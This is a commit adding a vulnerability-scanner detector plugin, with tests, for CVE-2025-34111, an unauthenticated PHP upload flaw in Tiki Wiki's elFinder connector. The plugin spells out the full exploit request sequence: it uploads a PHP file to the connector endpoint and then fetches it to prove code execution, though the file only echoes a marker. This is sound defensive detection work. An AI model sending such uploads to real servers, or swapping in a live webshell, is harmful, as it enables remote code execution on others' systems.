Merge pull request #696 from crackatoa:tikiwiki-cve-2025-34111

PiperOrigin-RevId: 816659329
Change-Id: I20b01152d889774fb3f5c9184456016fe38a7123

Author: copybara-github

templated/templateddetector/plugins/cve/2025/Tikiwiki_CVE_2025_34111.textproto

@@ -0,0 +1,101 @@
+# proto-file: proto/templated_plugin.proto
+# proto-message: TemplatedPlugin
+
+###############
+# PLUGIN INFO #
+###############
+
+info: {
+  type: VULN_DETECTION
+  name: "Tikiwiki_CVE_2025_34111"
+  author: "[email protected]"
+  version: "1.0"
+}
+
+finding: {
+  main_id: {
+    publisher: "GOOGLE"
+    value: "CVE-2025-34111"
+  }
+  severity: CRITICAL
+  title: "Tiki Wiki Unauthenticated File Upload (CVE-2025-34111)"
+  description: "Tiki Wiki versions <= 15.1 are susceptible to unauthenticated file upload that leads to remote code execution. A remote and unauthenticated attacker can send crafted HTTP requests from this endpoint to upload malicious php file to get remote code execution."
+  recommendation: "Update Tiki Wiki to version 15.2 or later."
+  related_id: {
+    publisher: "CVE"
+    value: "CVE-2025-34111"
+  }
+}
+
+config: {}
+
+###########
+# ACTIONS #
+###########
+
+actions: {
+  name: "tikiwiki_fingerprint"
+  http_request: {
+    method: GET
+    uri: "/tiki-index.php"
+    response: {
+      http_status: 200
+      expect_all: {
+        conditions: [
+          { body: {} contains: "Tiki Wiki CMS" }
+        ]
+      }
+    }
+  }
+}
+
+actions: {
+  name: "tikiwiki_upload_php_webshell"
+  http_request: {
+    method: POST
+    uri: "/vendor_extra/elfinder/php/connector.minimal.php"
+    headers: [
+      { name: "Content-Type" value: "multipart/form-data; boundary=da77a42118180b4af01977b6627ab7ab" }
+    ]
+    data: "--da77a42118180b4af01977b6627ab7ab\r\nContent-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n--da77a42118180b4af01977b6627ab7ab\r\nContent-Disposition: form-data; name=\"target\"\r\n\r\nl1_Lw\r\n--da77a42118180b4af01977b6627ab7ab\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"tsunami_security_scan.php\"\r\nContent-Type: application/octet-stream\r\n\r\n<?php echo \"valid_\" . \"{{ payload }}\";?>\r\n--da77a42118180b4af01977b6627ab7ab--\r\n"
+    response: {
+      http_status: 200
+      expect_all:{
+        conditions:[
+          { body: {} contains: "added" }
+        ]
+      }
+    }
+  }
+}
+
+actions: {
+  name: "tikiwiki_trigger_code_execution"
+  http_request: {
+    method: GET
+    uri: "/vendor_extra/elfinder/files/tsunami_security_scan.php"
+    response: {
+      http_status: 200
+      expect_all: {
+        conditions: [
+          { body: {} contains: "valid_tsunami" }
+        ]
+      }
+    }
+  }
+}
+
+#############
+# WORKFLOWS #
+#############
+
+workflows: {
+  variables: [
+    { name: "payload" value:"tsunami_{{ T_UTL_CURRENT_TIMESTAMP_MS }}"}
+  ]
+  actions: [
+    "tikiwiki_fingerprint",
+    "tikiwiki_upload_php_webshell",
+    "tikiwiki_trigger_code_execution"
+  ]
+}

templated/templateddetector/plugins/cve/2025/Tikiwiki_CVE_2025_34111_test.textproto

@@ -0,0 +1,67 @@
+# proto-file: proto/templated_plugin_tests.proto
+# proto-message: TemplatedPluginTests
+
+config: {
+  tested_plugin: "Tikiwiki_CVE_2025_34111"
+}
+
+tests: {
+  name: "whenVulnerable_returnsTrue"
+  expect_vulnerability: true
+
+  mock_http_server: {
+    mock_responses: [
+      {
+        uri: "/tiki-index.php"
+        status: 200
+        body_content: '<meta name="generator" content="Tiki Wiki CMS Groupware">'
+      },
+      {
+        uri: "/vendor_extra/elfinder/php/connector.minimal.php"
+        status: 200
+        body_content: "added"
+      },
+      {
+        uri: "/vendor_extra/elfinder/files/tsunami_security_scan.php"
+        status: 200
+        body_content: "valid_tsunami"
+      }
+    ]
+  }
+}
+
+tests: {
+  name: "whenNotVulnerable_returnsFalse"
+  expect_vulnerability: false
+
+  mock_http_server: {
+    mock_responses: [
+      {
+        uri: "/tiki-index.php"
+        status: 200
+        body_content: '<meta name="generator" content="Tiki Wiki CMS Groupware - https://tiki.org">'
+      },
+      {
+        uri: "/vendor_extra/elfinder/php/connector.minimal.php"
+        status: 200
+        body_content: "error"
+      }
+    ]
+  }
+}
+
+tests: {
+  name: "whenNotTikiwiki_returnsFalse"
+  expect_vulnerability: false
+
+  mock_http_server: {
+    mock_responses: [
+      {
+        uri: "TSUNAMI_MAGIC_ANY_URI"
+        status: 200
+        body_content: "Hello world"
+      }
+    ]
+  }
+}
+